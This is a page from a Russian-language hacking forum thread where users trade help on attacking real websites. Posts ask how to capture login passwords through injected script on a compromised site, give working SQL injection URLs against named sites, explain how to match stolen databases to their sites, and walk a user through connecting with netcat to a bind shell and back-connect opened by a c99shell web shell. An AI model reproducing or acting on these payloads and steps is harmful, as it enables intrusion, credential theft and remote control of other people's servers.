Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Всем привет!
    На сайте получил возможность добавлять/изменять новости... возможно ли при помощи js(или еще чего) перехватить какнить вводимые логин и пасс из формы входа???
    Куки в принципе не интересуют! ..нужен сам пасс, мб к мылу подойдет и т.п.
     
  2. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    http://www.securitylab.ru/contest/212101.php
    https://rdot.org/forum/showthread.php?t=32
    https://rdot.org/forum/showthread.php?t=503
     
  3. silverboy440

    silverboy440 New Member

    Joined:
    19 Nov 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    вот еще накапал...

    http://oldtitan.ja.org/challenge.php?page=rules&id=22'+union+all+select+1,2,3,'str1','str2',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+INFORMATION_SCHEMA.COLUMNS+--+

    http://oldtitan.ja.org/area_admin.php?=id3 без успеха...
     
  4. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    http://188.230.77.4:80/src/damagetypes.php?id=%bf'%bf"
    помогите раскрутить иньекцию. Вообщем сканерюга выдает ошибку SQL, но UNION , ORDER BY и GROUP BY не работают, и база даных реагирует только на кирилицу и только тогда виплевывает ошыбку, может кто то что то подскажет потому что я уже мозги сломал.
     
  5. GIG

    GIG New Member

    Joined:
    17 Apr 2010
    Messages:
    46
    Likes Received:
    4
    Reputations:
    5
    В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .
     
    #15905 GIG, 19 Jan 2011
    Last edited: 19 Jan 2011
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    в форумах я ищу название форумов и топиков, потом по гуглу ищу, в других кмс таким же макаром ищу что нибудь индивидуальное для сайта что бы ссузить список поиска, еще вывожу мыло админа, часто мыла на том же домене что и сайт...вариантов много...
     
  7. viziter-msk

    viziter-msk New Member

    Joined:
    16 Jan 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    а есть у кого нить пособие как искать и с чего начинать при поиске XSS
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://forum.antichat.ru/showthread.php?p=2343252

    какие способы хочешь? в статях все нормально написано и описано.. если не понял- читай еще раз
    не понимаю я вас...
     
    _________________________
  9. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    как подобные скули крутить? и чем вызвано сиё странное поведение?
    [​IMG]
    http://www.razda4a.ru/?news=12+order+by+5--
     
  10. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    zlo12
    http://www.razda4a.ru/?news=12;select+version()::int-- 1
     
    2 people like this.
  11. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    кодировку нынче не умеют менять? Koi8-R
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    PostgreSQL
     
    1 person likes this.
  13. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    тупанул, спасибо ^_^
     
  14. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    Подскажите в веб шелл есть Binding port:
    Открыл доступ говорит
    Binding... ok! Connect to :123123! You should use NetCat©, run "nc -v 123123"!
    Как его заюзать если линукса нету (винда) и по какому ip адресу коннектится? (по имени домена?)
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    качай неткат для винды, каннект можно делать или к серверному IP или к домену.
     
    _________________________
    1 person likes this.
  16. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    nc -v xxx.com 123123
    xxx.com [xxx.xxx.xxx.xxxx] 123123 (?): connection refused

    nc -v xxx.com:123123
    xxx.com:123123: forward host lookup failed: h_errno 11004: NO_DATA

    подскажите как его использовать если можно примерчик, там еще пасс есть, что я делаю не так?
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    nc 127.0.0.1 22

    nc [IP] пробель [port]
     
    _________________________
  18. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    все понял надо было через Using С, а я делал через Using Perl

    welcome to c99shell
    /bin/bash: not found

    в веб шелл напечатал
    echo $PATH
    вышло
    /sbin:/bin:/usr/sbin:/usr/bin

    подскажите что сделать?
     
    #15918 noviyuser, 19 Jan 2011
    Last edited: 19 Jan 2011
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    я чо то не понимаю тебя, ты откуда запускаеш неткат?

    шелл то тут причем, открыл порт через шелл, щас забудь о шелле , открой неткат и каннектись
     
    _________________________
  20. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    Так и сделал все отлично законнектилось (попросил пасс, ввел его) дальше пишет
    welcome to c99shell
    /bin/bash: not found
    на винде в консоле которую nc запускал и дальше висит

    Через Back connection: пришлось делать спасибо большое за ответы
     
    #15920 noviyuser, 19 Jan 2011
    Last edited: 19 Jan 2011
Thread Status:
Not open for further replies.